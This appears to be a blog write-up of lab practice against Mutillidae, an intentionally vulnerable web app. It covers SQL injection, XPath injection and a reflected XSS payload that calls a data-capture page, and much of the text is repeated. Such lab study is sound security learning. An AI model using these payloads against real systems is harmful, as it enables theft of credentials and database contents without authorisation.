You have to enter a user/pass and it will return the info for that account.
The SOAP requests are injectable.
The API is a bit chatty:
User stabinthedark does not exist
User admin already exists
The API allows us to createUser without any security.
The getUser operation can be made to list enumerate all users.
' or username like '%';#
Because it's a non-blind sqli, we can use it to get passwords (or any other data we know the table/column names of), stuffing the results into a column like signature:
admin' union select username, password from accounts where username = 'admin' limit 1,1;#
Because the permissions are so bad, we can even look up all the tables (and from there all the columns, and from there all the content...):
admin' union select table_schema, table_name from information_schema.tables;#
updateUser just overwrites data without any security checks at all. Entering naughty things into the fields resulted in a chatty error message (decoded by this) telling me how the query was formulated.
UPDATE accounts
SET
username = 'admin',
password = 'default',
mysignature = 'default'
WHERE
username = 'admin';
Because this is a multiline statement, it's a bit tricker to inject, but still doable. But why bother when it is already allowing you to update accounts with no authentication or authorization checks!
The page is also vulnerable to reflected XSS, e.g. injecting
...into this GET...
..leads to the 'attacker' page being called.
To return all user info:
For the SQL version: or true;#
For the XPath version: ' or 'a' = 'a
For the SOAP version, all you have to do is install SoapUI, paste in the WSDL location to generate sample requests, then the API allows you to CRUD account entries - no security whatsoever.
Note: I had problems getting SoapUI 5.x.x to work with Kali, so I used 4.x.x instead.
The SOAP requests are injectable.
The API is a bit chatty:
User stabinthedark does not exist
User admin already exists
The API allows us to createUser without any security.
The getUser operation can be made to list enumerate all users.
' or username like '%';#
Because it's a non-blind sqli, we can use it to get passwords (or any other data we know the table/column names of), stuffing the results into a column like signature:
admin' union select username, password from accounts where username = 'admin' limit 1,1;#
Because the permissions are so bad, we can even look up all the tables (and from there all the columns, and from there all the content...):
admin' union select table_schema, table_name from information_schema.tables;#
updateUser just overwrites data without any security checks at all. Entering naughty things into the fields resulted in a chatty error message (decoded by this) telling me how the query was formulated.
UPDATE accounts
SET
username = 'admin',
password = 'default',
mysignature = 'default'
WHERE
username = 'admin';
Because this is a multiline statement, it's a bit tricker to inject, but still doable. But why bother when it is already allowing you to update accounts with no authentication or authorization checks!
The page is also vulnerable to reflected XSS, e.g. injecting
<script>new Image().src = "http://localhost/mutillidae/index.php?page=capture-data.php";</script>
...into this GET...
http://localhost/mutillidae/index.php?page=user-info.php&username=%3Cscript%3Enew+Image%28%29.src+%3D+%22http%3A%2F%2Flocalhost%2Fmutillidae%2Findex.php%3Fpage%3Dcapture-data.php%22%3B%3C%2Fscript%3E&password=&user-info-php-submit-button=View+Account+Details
..leads to the 'attacker' page being called.
I didn't bother to send the cookie and whatnot as payload (which I'd need if I sent the request to another domain) because it's trivial.
No comments:
Post a Comment